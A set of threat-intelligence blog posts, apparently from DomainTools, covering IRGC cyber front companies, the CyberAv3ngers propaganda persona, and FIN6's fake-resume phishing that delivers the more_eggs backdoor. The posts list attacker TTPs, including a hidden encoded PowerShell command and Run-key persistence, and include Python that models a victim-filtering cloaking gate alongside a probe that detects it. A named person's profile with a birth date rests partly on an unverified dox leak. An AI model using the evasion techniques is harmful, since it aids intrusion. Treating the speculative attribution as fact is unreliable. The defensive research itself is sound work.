The IRGC’s cyber operations rely heavily on a dense and evolving ecosystem of affiliated companies, some covertly managed through military intermediaries, others openly registered as “cyber defense,” “AI research,” or “IT solutions” firms. This web serves multiple strategic purposes. First, it allows the IRGC to outsource technical labor and scale operations without overexposing its formal personnel. Second, it provides plausible deniability, as these front firms can operate under civilian-facing banners while conducting state-directed offensive cyber activities. Third, it enables a rotating model of corporate obfuscation, where companies like Emen Net Pasargad are dissolved or sanctioned only to reappear under new names like Ayandeh Sazan Sepehr Aria, often with overlapping staff and clients. These firms are frequently staffed by IRGC veterans or relatives of high-ranking cyber officials, further blurring the lines between state, contractor, and covert operator.
This model closely parallels revelations from the i-SOON (安洵) data leak, which exposed how China’s Ministry of Public Security (MPS) and provincial security bureaus have long contracted out cyber operations to nominally private firms. Like the IRGC’s cyber complex, Chinese firms such as i-SOON and Chengdu 404 maintain the veneer of legitimate enterprise while developing spyware, managing fake persona farms, and carrying out state-sponsored intrusions. In both Iran and China, this hybrid public-private structure allows state entities to mask state cyber activity behind corporate fronts, maintain flexibility, and engage in offensive campaigns without bearing the full diplomatic cost.
Moreover, just as Iran’s firms like Cyberban Institute and Kavosh Center double as ideological and technical platforms, Chinese contractors often support both domestic surveillance and global espionage, engaging in infrastructure targeting, data exfiltration, and information control under the guise of national innovation. This convergence of state-backed ideology, cyber warfare, and privatized labor reveals a shared authoritarian blueprint: One in which cyber capabilities are cultivated through semi-privatized ecosystems designed to insulate command structures while enabling scalable, deniable aggression in the global digital theater.
Expanded Corporate Ecosystem Supporting IRGC Cyber Ops
The IRGC’s cyber capabilities rely not solely on military or intelligence personnel but on an expansive and deliberately obscured ecosystem of contracting companies, technical institutes, and shell entities that function as both operational extensions and recruitment/talent pipelines. These firms play a crucial role in sustaining the IRGC’s cyber warfare doctrine, developing malware, testing exploits, maintaining infrastructure, and providing a legal or commercial façade for offensive operations.
What makes these companies particularly effective, and elusive, is the way they straddle the boundary between legitimacy and subversion. Many of them present as cybersecurity vendors, AI startups, or educational technology labs, marketing themselves to civilian, academic, and even international clients. Behind the scenes, however, they serve as contractors for the IRGC’s Electronic Warfare and Cyber Defense Organization (EWCD), Intelligence Organization (IO), and Quds Force, executing tasks that range from infrastructure reconnaissance and SIGINT analysis to psychological warfare and influence ops.
This system is both resilient and adaptive. Companies are frequently rebranded, dissolved, or split into subsidiaries following public exposure or sanctions. For instance, Net Peygard Samavat, once exposed for its involvement in Iranian state cyber operations, later became Emen Net Pasargad, which itself was reconstituted as Ayandeh Sazan Sepehr Aria. Despite their changing names and corporate registrations, these entities retain the same personnel, mission scope, and government sponsors, effectively outlasting sanction regimes and Western takedown efforts.

Moreover, the personnel who operate these firms often rotate between IRGC intelligence positions, academic research roles, and private-sector leadership, creating a feedback loop where state doctrine, technical innovation, and civilian infrastructure become interwoven. This also creates a recruitment channel: Young developers and engineers are often brought into these companies under the banner of patriotic service or career opportunity, then quietly integrated into national-level cyber missions.
In effect, these firms function as force multipliers for Iran’s cyber program. They provide scalability, deniability, and a legal buffer between the Iranian state and its digital aggression. As international scrutiny tightens, the IRGC is likely to continue leaning on these corporate proxies to advance technical capability while avoiding direct attribution, mirroring similar models seen in China (e.g., i-SOON) and Russia (e.g., contractors like NTC Vulkan).
Below is a detailed examination of these key companies and their connections.

Core Contractor Entities and Their Functions
- Emen Net Pasargad (ایمننت پاسارگاد) – Once a flagship contractor for disinformation and foreign interference (e.g., impersonating the Proud Boys during the 2020 U.S. election). Dissolved in 2023. Sanctions Source
- Ayandeh Sazan Sepehr Aria (آریا سپهر سازان آینده) – A successor to Emen Net, continuing operations in information operations and malware development. Founded by Mohammad Bagher Shirinkar. Recorded Future
- Mahak Rayan Afraz (محک رایان افراز) – Specialized in AI and surveillance tooling, including Hazm (a Persian NLP engine) and Gol Rokh (a facial recognition platform). Disbanded in mid-2023 amid U.S. pressure. Treasury
- DSPRI (موسسه سنجش داده پیشرفته) – Linked to IRGC Quds Force Unit 300, DSPRI handles signal interception and encrypted traffic decryption, including battlefield deployments in Syria, Lebanon, and Iraq. Recorded Future, p. 14
- Sabrin Kish (شرکت صابرین کیش) – Developed sniffers and ICS tools sold to IRGC clients; also engaged in foreign contracts (e.g., deal with Iraq’s NSA head Faleh al-Fayyadh). Maintains financial and corporate overlap with IRGC Cooperative Foundation. Wikipedia
- Soroush Saman Co. (شرکت توسعه الکترونیکی و مخابراتی سروش سامان) – Supplied surveillance and tracking systems to Hezbollah, and built AI-based phone surveillance for Unit 300. [IntelliTimes coverage via Lab Dookhtegan]
- Afkar Systems (افکار سیستم) – Tied to Nemesis Kitten APT, allegedly led by Ahmad Khatibi Aghda. Operated through Center 2060 and Cyber Base 2000, both under EWCD’s umbrella. CISA Advisory
- Parnian Telecommunication (شرکت الکترونیکی و مخابراتی پرنیان) – Facilitates cyber workforce recruitment for IRGC and MRA-linked projects. Job ads call for infosec and penetration testing expertise. Recorded Future, p. 19
- Kavosh Center (مرکز کاوش) – Offensive R&D hub tied to the Shahid Kaveh Group. Led by IRGC affiliate “Shayan” (Malek Mohammadi Nejad). Possibly involved in TTP development and APT tool testing. Recorded Future
- Cyberban Institute (موسسه سایبربان) – Run by Mehdi Lashgarian, nephew of IRGC cyber leader Hamidreza Lashgarian. This front publishes ideological content, disinfo narratives, and tech analysis favorable to IRGC doctrine. Recorded Future, p. 22
Observations on Structure and Strategy
The structure and behavior of IRGC-affiliated cyber firms reveal a deliberate and adaptive operational model. Many of these companies engage in strategic rebranding, dissolving or renaming themselves after being sanctioned or exposed: Net Peygard reemerged as Emen Net, which later became Ayandeh Sazan, while Dehkadeh Telecom transitioned into Mahak Rayan Afraz, with a new identity likely forthcoming. These transitions help avoid regulatory scrutiny while maintaining operational continuity. Furthermore, interlocking leadership is a hallmark of the ecosystem: figures such as Mohammad Bagher Shirinkar, Hamidreza Lashgarian, and Esmail Rahimi appear across multiple entities, indicating a centralized and tightly coordinated management structure. The ecosystem also supports technology transfer abroad, with tools and capabilities exported to IRGC-aligned actors in Iraq, Syria, and Lebanon, particularly via Quds Force Unit 300. Notably, these firms are often the technical and logistical backends for known APT groups: Afkar Systems underpins Nemesis Kitten, Mahak Rayan Afraz has links to Tortoiseshell (TA456), and clusters tied to the Shahid Kaveh Group appear to support Pioneer Kitten operations.
Operational Forecast and Strategic Implications
Intelligence Group 13 functions as the operational core of the IRGC’s cyber disruption strategy, a convergence point where technical sabotage, psychological warfare, and revolutionary ideology are seamlessly integrated. Operating under the umbrella of the Shahid Kaveh Group, Team 13 is not an independent or freelance actor but a disciplined tactical cell embedded in a broader, multi-layered command system overseen by IRGC EWCD, IO, and Quds Force divisions. Its mission is augmented through propaganda arms such as CyberAveng3rs, which act not only as amplifiers of defacement and intrusion campaigns but also as strategic influence assets projecting IRGC narratives into public and geopolitical consciousness.
The group’s tradecraft spans traditional APT techniques, such as credential harvesting, critical infrastructure penetration (e.g., Unitronics PLCs, fuel pump logic, and water treatment systems), and covert malware deployment (e.g., IOControl, Project Binder). Yet what sets Team 13 apart is its parallel investment in symbolic messaging, issuing threats via Telegram, leaking screenshots via Instagram handles like @mr.sul.ir, and invoking martyrdom and Islamic resistance to create a psychological echo chamber around each technical act.
This entire operation is scaffolded by a front company and contractor ecosystem designed to provide deniability, talent, infrastructure, and logistical support. These include Afkar Systems (linked to Nemesis Kitten), Mahak Rayan Afraz (associated with TA456), and Kavosh Center (supporting Pioneer Kitten), among others. These firms are part of a strategy of institutional layering and rebranding, allowing the IRGC to rotate through corporate identities while sustaining long-term capabilities. Rebranding paths such as Net Peygard → Emen Net → Ayandeh Sazan show how the IRGC evades sanctions without losing operational momentum.
Key Takeaways:
- Intelligence Group 13 is a deeply embedded extension of the IRGC’s strategic cyber doctrine, not an isolated threat actor.
- Psychological operations are prioritized on par with malware deployment, reflecting a dual mission of technical and perceptual warfare.
- The martyrdom framework (e.g., naming conventions like “Shahid Kaveh”) plays a pivotal role in unifying cyber actions with ideological legitimacy.
- The use of contractor ecosystems and front companies provides flexibility, plausible deniability, and continuity across sanctions and takedowns.
Risk Assessment:
Future campaigns by Intelligence Group 13 and its affiliates are likely to blend cyber-kinetic threats with narrative manipulation, targeting not just critical infrastructure but public perception and institutional trust. This includes:
- Threatening or disrupting civilian infrastructure in the U.S., Israel, and Gulf States
- Deploying psychological campaigns through channels like CyberAveng3rs, timed with physical intrusions
- Leveraging rebranded contractors to deliver tooling and intelligence capabilities both domestically and to proxy forces abroad (e.g., Hezbollah, PMF in Iraq)
Defending against this threat requires not only technical hardening but cognitive resilience, recognizing that the IRGC’s cyber ambitions are as much about controlling the story as they are about breaching the network.
Sign Up For DomainTools Investigations’ Newsletter for the Latest Research
Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

As the conflict between Iran and Israel escalated in early 2025, it quickly expanded beyond missiles and airstrikes into a broader battle for digital and psychological dominance. Among the most visible players in this new front is a group known as CyberAv3ngers. Their operations have included hijacking water systems, defacing programmable logic controllers (PLCs), and ridiculing Israeli cybersecurity efforts across social media platforms like Telegram and Twitter. Yet, their rise wasn’t built solely on technical exploits—it began with fabrications and theatrical messaging. CyberAv3ngers evolved from obscure defacers into sophisticated narrative operators, blending cyber sabotage with psychological operations. As their influence grew, so did suspicions of deeper affiliations—particularly with Iran’s Cyber Command, suggesting that the group may be more than a rogue actor and instead part of a broader state-aligned strategy.
Act I: A Hot War Fuels a Digital One
The ongoing conflict between Iran and Israel has intensified across both physical and digital fronts. In the last two weeks alone, Iran has launched multi-warhead missile attacks targeting major Israeli cities such as Tel Aviv and Haifa. In response, Israel conducted retaliatory airstrikes against Iranian military installations, nuclear sites, and key IRGC-Cyber Electronic Command (IRGC-CEC) facilities in cities like Isfahan and Tehran. Alongside these kinetic exchanges, Iranian cyber operators have reportedly hijacked Israeli CCTV and smart home cameras to evaluate the precision and impact of missile strikes in real time. Concurrently, cyberattack activity has spiked dramatically since early June, affecting sectors ranging from energy and defense to agriculture and municipal infrastructure across Israel and extending to Western targets.
Act II: Who Are CyberAv3ngers?


Before CyberAv3ngers emerged as a recognizable threat actor in 2023, they appeared to be reviving an obscure alias from the past. In 2020, a group calling itself “Cyber Avengers” claimed responsibility for a power outage and railway disruption in Israel, events that Israeli officials attributed to technical faults, not cyberattacks. No malware was identified, no indicators of compromise (IOCs) were released, and the group faded from view. Then, in September 2023, a new Telegram channel @CyberAveng3rs was launched, adopting the old name with a stylized twist and retroactively tying itself to the 2020 claims. The group posted ideological threats, listed infrastructure targets, and positioned itself as a cyber-arm of resistance. Its first major public claim came on October 8, 2023, when it announced it had hacked the Dorad power station, one of Israel’s largest private energy producers, a dramatic move intended to cement its arrival in the cyber threat landscape.
Except they didn’t hack it.
CyberAv3ngers' claim that they hacked Israel’s Dorad private power station on October 8, 2023, was quickly debunked by technical analysis. Investigators from Securelist confirmed that the images shared by the group were not the result of a new intrusion but were recycled from a 2022 data leak by the Iranian APT group Moses Staff. The visuals had been cropped, overlaid with new logos, and presented as fresh evidence, but metadata and compression timestamps matched the original files. There was no supporting technical evidence—no new malware, logs, or IOCs to indicate that CyberAv3ngers had gained real access to Dorad’s infrastructure. The only actual activity was a denial-of-service (DDoS) attack on the Dorad website, which served more as a psychological support act than an operational exploit. This episode marked a clear shift in CyberAv3ngers' strategy: from technical sabotage to theatrical propaganda.
Act III: The Illusion of the Dorad Hack

In reality, CyberAv3ngers did not breach the Dorad power station in October 2023. Instead, they repurposed images from a 2022 leak by the Iranian APT group Moses Staff. These files, though legitimate at the time of their original release, were outdated. CyberAv3ngers cropped the images, added their own defacement slogans, and circulated them as if they were proof of a new, live intrusion. No technical compromise occurred at Dorad, but the impact was psychological. The staged attack triggered a wave of reactions across social media and threat monitoring communities. Telegram lit up with reposts, and news outlets picked up the story. To reinforce the illusion, CyberAv3ngers launched DDoS attacks on Israeli websites and released altered versions of Israeli infrastructure security guidance under mocking titles like “Advice for Victims.” It was a performance—but one calibrated to sow fear and disrupt public trust.
Act IV: When the Hacks Became Real

While some of CyberAv3ngers’ early claims were rooted in propaganda, the group did carry out real and damaging cyberattacks. Between November 2023 and April 2024, at least 29 confirmed intrusions targeting industrial control systems (ICS) and operational technology (OT) in the United States were attributed to the group. Among these incidents were compromises of Unitronics PLCs used in municipal water utilities, including one in Aliquippa, Pennsylvania, where human-machine interfaces (HMIs) were defaced with the message: “You have been hacked, down with Israel.” The group also targeted fuel distribution systems, specifically Orpak and Gasboy terminals, disrupting their functionality. Additional intrusions affected routers, IP cameras, firewalls, and HMIs across various sectors of critical infrastructure. At the center of these campaigns was a custom Linux-based malware tool known as IOCONTROL, which enabled persistent access, remote command execution, and stealthy communication via encrypted MQTT channels. These attacks confirmed that beneath the narrative manipulation, CyberAv3ngers had a genuine operational capability with real-world consequences.
Act V: Iran’s Cyber Doctrine Evolves

CyberAv3ngers represents the latest evolution in Iran’s long-standing tradition of blending cyber operations with ideological messaging. While groups like Moses Staff, APT33, and Charming Kitten have previously combined technical intrusions with media theatrics, CyberAv3ngers has refined the model into a fully realized propaganda apparatus. Their approach is not just to breach systems, but to control the narrative surrounding those breaches—turning each operation into a performance aimed at both foreign audiences and domestic sympathizers. What sets them apart is the deliberate construction of a digital persona that fuses propaganda, defacement, and symbolic domain control into a cohesive identity.
Further supporting this narrative-centric shift, we observed three domains registered within hours of CyberAv3ngers’ September 15, 2023 Telegram launch post—a message that introduced the group’s rebranding and outlined threats to Israeli infrastructure. The domains were:
- cyberav3ngers.com
- cyberav3ngers.org
- cyberav3ngers.net
All three were registered through Namecheap, sit on Namecheap’s default nameservers under registrar-servers.com, and have WHOIS privacy masking enabled via Withheld for Privacy, Namecheap’s proxy service. As of this writing, none of the domains hosts an active website or resolves to public content. Passive DNS history shows that these domains were briefly pointed at placeholder IP addresses, but no C2 or content delivery infrastructure has been deployed, strongly suggesting that their primary function is symbolic rather than operational.

This domain registration pattern aligns tightly with CyberAv3ngers’ pivot to psychological operations. Rather than functioning as delivery vehicles for malware or command-and-control beacons, these domains appear to serve as digital flags staking ideological territory on the internet. Just as their defacements aim to instill fear and assert presence, these unused domains enhance the group’s narrative power, presenting them as structured, intentional, and enduring. By echoing the group's name in global domain registries, CyberAv3ngers reinforces its persona as a persistent ideological combatant—building credibility not just through code, but through semiotic control.
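The pivot described above (registrations landing within hours of the launch post, privacy-proxied, parked on the registrar’s default nameservers, and pointed only at placeholder addresses) can be turned into a repeatable check. The Python below is an added example written for this page, not DomainTools code or output. The launch-post time, the registration timestamps, the parking network and the unrelated control domain are constructed placeholders; in practice the RDAP and passive DNS values would come from the analyst’s own data sources.

```python
import ipaddress
from datetime import datetime, timedelta, timezone

# Assumed timestamp of the group's launch post. The exact post time is not
# given in the source, so this value is a placeholder for the worked example.
LAUNCH_POST = datetime(2023, 9, 15, 18, 0, tzinfo=timezone.utc)

# Constructed RDAP-style records. The timestamps, IPs and the control domain
# are hypothetical sample data, not real WHOIS or passive DNS output.
RECORDS = [
    {"domain": "cyberav3ngers.com", "registrar": "NameCheap, Inc.",
     "created": "2023-09-15T20:11:04Z",
     "nameservers": ["dns1.registrar-servers.com", "dns2.registrar-servers.com"],
     "registrant_org": "Privacy service provided by Withheld for Privacy ehf",
     "pdns_a": ["192.0.2.10"]},
    {"domain": "cyberav3ngers.org", "registrar": "NameCheap, Inc.",
     "created": "2023-09-15T20:12:31Z",
     "nameservers": ["dns1.registrar-servers.com", "dns2.registrar-servers.com"],
     "registrant_org": "Privacy service provided by Withheld for Privacy ehf",
     "pdns_a": ["192.0.2.10"]},
    {"domain": "cyberav3ngers.net", "registrar": "NameCheap, Inc.",
     "created": "2023-09-15T20:14:09Z",
     "nameservers": ["dns1.registrar-servers.com", "dns2.registrar-servers.com"],
     "registrant_org": "Privacy service provided by Withheld for Privacy ehf",
     "pdns_a": ["192.0.2.10"]},
    {"domain": "unrelated-example.net", "registrar": "GoDaddy.com, LLC",
     "created": "2023-06-01T09:30:00Z",
     "nameservers": ["ns1.unrelated-example.net", "ns2.unrelated-example.net"],
     "registrant_org": "Unrelated Example Ltd",
     "pdns_a": ["198.51.100.5"]},
]

# Constructed stand-in for a curated list of parking/placeholder address space.
PARKING_NETS = [ipaddress.ip_network("192.0.2.0/24")]


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def is_parked(addresses) -> bool:
    """True when every historical A record falls inside known parking space."""
    return all(any(ipaddress.ip_address(a) in net for net in PARKING_NETS)
               for a in addresses)


def score(rec: dict, anchor: datetime, window: timedelta = timedelta(hours=24)) -> dict:
    """Score one record against the 'registered right after the post, no real
    infrastructure' profile. Each signal contributes one point."""
    delta = parse_ts(rec["created"]) - anchor
    signals = {
        "registered_after_post_within_window": timedelta(0) <= delta <= window,
        "privacy_proxy": "withheld for privacy" in rec["registrant_org"].lower(),
        "registrar_default_dns": all(ns.endswith(".registrar-servers.com")
                                     for ns in rec["nameservers"]),
        "parked_only": is_parked(rec["pdns_a"]),
    }
    return {"domain": rec["domain"],
            "seconds_after_post": int(delta.total_seconds()),
            "signals": signals,
            "score": sum(signals.values())}


def registration_cluster(records, anchor: datetime, min_score: int = 3) -> list:
    """Domains whose registration is time-correlated with the anchor event and
    that share the low-effort, no-content profile."""
    scored = [score(r, anchor) for r in records]
    return [s["domain"] for s in scored
            if s["signals"]["registered_after_post_within_window"]
            and s["score"] >= min_score]


if __name__ == "__main__":
    for rec in RECORDS:
        print(score(rec, LAUNCH_POST))
    print("cluster:", registration_cluster(RECORDS, LAUNCH_POST))
```

The window and minimum score are tunable; the point of the scoring rather than a single boolean is that a privacy-proxied, parked domain is unremarkable on its own, and only the combination with the time correlation makes the registration look like a deliberate brand-staking act.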
CyberAv3ngers’ propaganda and PSYOPS narrative strategy:
- Builds on past Iranian hybrid groups like Moses Staff, APT33, and Charming Kitten, known for blending cyberattacks with ideological content.
- Operates a Telegram channel not just for updates, but as a staged information environment—complete with threats, slogans, and memes.
- Frequently shares repackaged defacements and screenshots to simulate recent operations.
- Registers domain names to establish symbolic control and brand presence (e.g., cyberav3ngers.com, cyberav3ngers.org, cyberav3ngers.net).
- Continues the Iranian model of patriotic hacker narratives, but with diminished separation between state and grassroots actors.
- Leverages these platforms to mock foreign security services, distribute edited guidance docs, and amplify the psychological effect of their campaigns.
Act VI: Who’s Behind the Mask?
The U.S. government has made no secret of its belief that Iran’s IRGC-Cyber Electronic Command (IRGC-CEC) is behind the escalating cyber campaigns targeting U.S. and Israeli infrastructure. In 2024 and early 2025, the U.S. Treasury sanctioned six IRGC-CEC officials, naming them as key players in attacks against critical systems, and the State Department’s Rewards for Justice program offered bounties of up to $10 million for information leading to their identification or location. Among the most prominent is Mahdi Lashgarian, a senior cyber operations official and likely architect behind multiple OT-focused malware campaigns. While public attribution has yet to confirm a direct link between Lashgarian and the alias Mr. Sul (or Mr. Soul), mounting circumstantial evidence places him squarely in the operational core of the CyberAv3ngers campaign.
Now, he’s also become a target.

In May 2025, an Israeli patriotic hacker group calling itself WeRedEvilsOG claimed on Telegram that they had successfully breached Lashgarian’s personal and professional accounts. The group released what it described as a “partial dox drop”, including purported email addresses, internal communications, and IRGC-linked credentials. While the authenticity of the data is still under review, the leak marked the first instance of direct retaliatory targeting against a named Iranian cyber commander involved in the ICS/OT threat landscape.


Profile: Mahdi Lashgarian
- Full Name: Mahdi (Mehdi) Lashgarian
- Date of Birth: June 2, 1989
- Nationality: Iranian
- Affiliation: Senior official in the Islamic Revolutionary Guard Corps – Cyber‑Electronic Command (IRGC‑CEC)
Why he’s suspected to be “Mr. Sul”
- Matches the technical and leadership profile attributed to the IOCONTROL malware operator
- Named in the same Rewards for Justice bounty notice targeting CyberAv3ngers operators
- His sanction timeline aligns with the rollout of the most destructive CyberAv3ngers campaigns
- Newly leaked data by WeRedEvilsOG reportedly ties him to multiple IRGC infrastructure assets
The inclusion of Lashgarian in public sanctions, U.S. bounty programs, and now retaliatory hacker operations by pro-Israel actors suggests that the shadow war between Iran and Israel has entered a new phase—one where attribution isn’t just technical, it’s personal.
Final Act: A War of Machines and Messages
CyberAv3ngers has evolved beyond a conventional threat actor into a strategic asset within Iran’s asymmetric warfare toolkit, combining real-world cyberattacks, recycled leaks, and targeted propaganda to amplify psychological impact. Their operations integrate technical capability, such as IOCONTROL malware and MQTT-based command and control, with ideological messaging distributed via Telegram, Twitter, and symbolic domain registrations. Whether or not “Mr. Sul” is truly Mahdi Lashgarian, the persona functions as a force multiplier, shaping narratives, intimidating adversaries, and reinforcing the perception of persistent threat. CyberAv3ngers aren’t just breaching systems; they’re engineering beliefs.

FIN6 and Financially Motivated Cybercrime
Skeleton Spider, also known as FIN6, is a long-running financially motivated cybercrime group that has continually evolved its tactics to maximize impact and profit. While the group initially gained notoriety for point-of-sale (POS) breaches and large-scale payment card theft, it has since shifted to broader enterprise threats, including ransomware operations.
In recent years, FIN6 has sharpened its focus on social engineering campaigns that exploit professional trust. By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. One of their preferred payloads is more_eggs, a stealthy JavaScript-based backdoor that facilitates credential theft, system access, and follow-on attacks, including ransomware deployment.
This research combines technical insights and practical analysis for both general audiences and cybersecurity professionals. We examine how FIN6 uses trusted cloud services, such as AWS, to host malicious infrastructure, evade detection, and ultimately deploy malware through socially engineered lures.
Phishing with Fake Resumes
FIN6 begins its attack by crafting phishing emails that impersonate job applicants. But their social engineering doesn't start in the inbox. The group has been observed initiating contact via professional job platforms like LinkedIn and Indeed, posing as enthusiastic job seekers and engaging with recruiters before following up with phishing messages. This adds a layer of authenticity and increases the chances of the recruiter trusting the source.
This phishing lure shows a professionally worded message from a fake applicant that references the domain as plain, non-hyperlinked text ('bobbyweisman[.]com') to bypass automated link detection. This tactic forces the recipient to manually type the URL into their browser.


These messages are carefully written and contain no clickable links, an evasion technique that helps them bypass security filters. Instead, recipients are forced to manually type a URL, which is often obfuscated with added spaces or underscores (“_”), such as “elizabethabarton. COM”.

Notably, the domains used in these campaigns often follow a pattern where the attacker's domain mimics a real applicant by combining a first and last name (e.g., bobbyweisman[.]com, ryanberardi[.]com). These domains are typically registered anonymously through GoDaddy, adding a layer of obfuscation that complicates threat attribution and takedown efforts. By exploiting GoDaddy’s domain privacy services, FIN6 further shields the true registrant details from public view and takedown teams. Although GoDaddy is a reputable and widely used domain registrar, its built-in privacy features make it easy for threat actors to hide their identities.
Whois records for these domains typically show redacted ownership information and standardized proxy entries, often pointing to GoDaddy’s domain privacy service. Abuse reports can technically be submitted via contact email fields listed in the Whois, commonly abuse@godaddy.com; however, responses and enforcement timelines vary.
It is likely the actors behind these domains use disposable or fraudulent email addresses, anonymous or foreign IP addresses, and prepaid or stolen payment methods to create and maintain these accounts. Combined with the use of resume-themed domain names and impersonation techniques, this registration strategy allows FIN6 to keep their infrastructure alive just long enough to carry out active phishing campaigns while avoiding rapid takedown by security researchers or registrars.

Cloud-Hosted Malware Infrastructure
FIN6 hosts its phishing sites using trusted cloud infrastructure, including AWS. These platforms are appealing to attackers due to:
- Ease of setup using services like EC2 and S3
- Low cost, with free-tier abuse or use of compromised billing accounts
- Cloud IP ranges that are often implicitly trusted by enterprise network filters
- Built-in scalability and the ability to rapidly provision disposable infrastructure
FIN6 has also previously been observed leveraging Amazon CloudFront to obscure infrastructure and evade detection. By fronting content with a CDN such as CloudFront, attackers mask the origin of malicious content, making it harder for defenders to trace and block the true hosting source.
FIN6 often sets up landing pages on cloud-hosted domains that resemble personal resume portfolios. These domains are usually mapped to AWS EC2 instances or S3-hosted static sites, making them difficult to distinguish from legitimate personal or business hosting.
These landing sites are built with traffic filtering logic to distinguish between potential victims and unwanted analysis tools. If the visitor doesn't match specific criteria, the site serves only benign content, typically a plain-text version of the resume or an error page.

To evade detection and analysis, FIN6 deploys a combination of environmental fingerprinting and behavioral checks, including:
- IP reputation and geolocation – Traffic is filtered to allow access only from residential ISP ranges, excluding connections from cloud infrastructure, VPN services, or known threat intelligence networks.
- Operating system and browser fingerprinting – The site checks for typical Windows browser user-agent strings, such as Mozilla/5.0 (Windows NT 10.0; Win64; x64). Visitors using Linux, macOS, or uncommon browsers are blocked or shown harmless content.
- CAPTCHA verification techniques – The site presents a CAPTCHA (such as Google reCAPTCHA) that must be completed before allowing access to any downloadable content. This prevents automated analysis tools and headless browsers from easily interacting with the site. In many cases, the CAPTCHA is only triggered when the visitor meets initial filtering conditions, acting as a final gate to ensure human presence before delivering the payload.
These layered filters ensure that the malicious content is only delivered to actual human recruiters browsing from typical home or office setups, while blocking security scanners and automated crawlers.
If the request meets all conditions, the site returns a CAPTCHA and a fake resume interface that eventually offers a ZIP download.
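To make the gating logic concrete, and to show the analyst’s counter-move, the following Python is an added example, not FIN6’s server-side code (which is not public) and not code from the original post. It models the three filters described above as a single decision function, then probes a site under several visitor profiles and flags cloaking when the responses diverge. The prefix table standing in for an IP reputation feed, the user-agent strings, and the fake_site stand-in for an HTTP fetch are assumptions; in a real probe the residential and datacenter profiles are realized by egressing through different networks, and the fetch would return a hash of the response body.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed stand-in for an IP reputation feed (RFC 5737 documentation ranges).
RESIDENTIAL_NETS = [ipaddress.ip_network("203.0.113.0/24")]
DATACENTER_NETS = [ipaddress.ip_network("198.51.100.0/24")]

# The gate only accepts a mainstream Windows desktop browser signature.
WINDOWS_BROWSER = re.compile(r"Mozilla/5\.0 \(Windows NT 10\.0; Win64; x64\)")


@dataclass(frozen=True)
class Visit:
    ip: str
    user_agent: str
    captcha_solved: bool = False


def classify_ip(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in RESIDENTIAL_NETS):
        return "residential"
    if any(addr in net for net in DATACENTER_NETS):
        return "datacenter"
    return "unknown"


def gate(visit: Visit) -> str:
    """Model of the landing page's decision logic: 'benign' is the plain-text
    resume or error page, 'captcha' the human check, 'payload' the ZIP download.
    Filters are applied in the order the text describes: IP, then browser,
    then the CAPTCHA as the final gate."""
    if classify_ip(visit.ip) != "residential":
        return "benign"
    if not WINDOWS_BROWSER.search(visit.user_agent):
        return "benign"
    if not visit.captcha_solved:
        return "captcha"
    return "payload"


WIN_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/124.0 Safari/537.36")
MAC_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5) AppleWebKit/605.1.15 "
          "(KHTML, like Gecko) Version/16.5 Safari/605.1.15")

# Assumed probe profiles; the IPs are whatever egress the analyst controls.
PROBE_PROFILES = {
    "cloud_scanner": Visit("198.51.100.7", "curl/8.4.0"),
    "residential_mac": Visit("203.0.113.21", MAC_UA),
    "residential_windows": Visit("203.0.113.21", WIN_UA),
}


def detect_cloaking(fetch, url: str, profiles=PROBE_PROFILES) -> dict:
    """Analyst-side differential probe: fetch the same URL under each profile
    and report the site as cloaked if the responses are not identical."""
    responses = {name: fetch(url, visit) for name, visit in profiles.items()}
    return {"cloaked": len(set(responses.values())) > 1, "responses": responses}


def fake_site(url: str, visit: Visit) -> str:
    # Stand-in for an HTTP fetch against the landing page. A real probe would
    # return a digest of the response body; here it returns the gate's decision.
    return gate(visit)


if __name__ == "__main__":
    print(detect_cloaking(fake_site, "https://resume.invalid/"))
```

The practical lesson is that a single fetch from a sandbox or a cloud-hosted scanner will only ever see the benign branch; the cloaking is visible only by comparing at least two profiles, one of which looks like the intended victim.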

All the following domains have been confirmed as hosted on AWS infrastructure:
- bobbyweisman[.]com
- emersonkelly[.]com
- davidlesnick[.]com
- kimberlykamara[.]com
- annalanyi[.]com
- bobbybradley[.]net
- malenebutler[.]com
- lorinash[.]com
- alanpower[.]net
- edwarddhall[.]com
These sites often display a professional-looking fake resume, complete with a CAPTCHA to verify human access. Additionally, the attackers employ traffic filtering techniques to control who can access the malicious content. Only users appearing to be on residential IP addresses and using common Windows-based browsers are allowed to download the malicious document. If the visitor originates from a known VPN service, cloud infrastructure like AWS, or corporate security scanners, the site instead delivers a harmless plain-text version of the resume. This selective delivery tactic helps the malware infrastructure avoid detection and analysis. If conditions are met, the site delivers a malicious ZIP file to the visitor.
More_eggs Malware Delivery Chain
The malware delivery uses simple techniques wrapped in deceptive visuals:
- ZIP file contains a disguised .LNK (Windows shortcut) file
- LNK file executes hidden JavaScript using wscript.exe
- Payload connects to external resources and downloads the More_eggs backdoor
More_eggs, developed by the "Venom Spider," also known as "Golden Chickens," is a modular JavaScript backdoor offered as malware-as-a-service. It allows for command execution, credential theft, and follow-on payload delivery, often operating in memory to evade detection.
Common TTPs Observed:
- Initial Access: .zip archive containing a .lnk file
- Execution: Uses LOLBins like ie4uinit.exe, regsvr32.exe, or msxsl.exe
- Persistence: Registry run keys or scheduled tasks, e.g. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<RandomName>
- C2 Communication: HTTPS with spoofed User-Agent headers, e.g. Mozilla/5.0 (Windows NT 10.0; Win64; x64)
- PowerShell Execution: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <Base64>
How to Defend Against These Attacks
For Recruiters and General Staff:
- Avoid manually typing in resume links from unknown senders
- Be cautious of CAPTCHA-protected resume sites
- Never download ZIP files unless verified by IT
For Security Teams:
- Monitor for outbound traffic to domains that appear recently re-registered or show signs of ownership change. These domains may have been benign in the past and are now being used for malicious purposes. This reuse can help attackers benefit from existing domain reputation and bypass domain age-based filters.
- Block execution of .lnk files inside ZIPs from untrusted sources
- Detect use of LOLBins executing PowerShell or JScript unexpectedly
- Implement EDR policies for scripting engine abuse (e.g., wscript.exe, msxsl.exe)
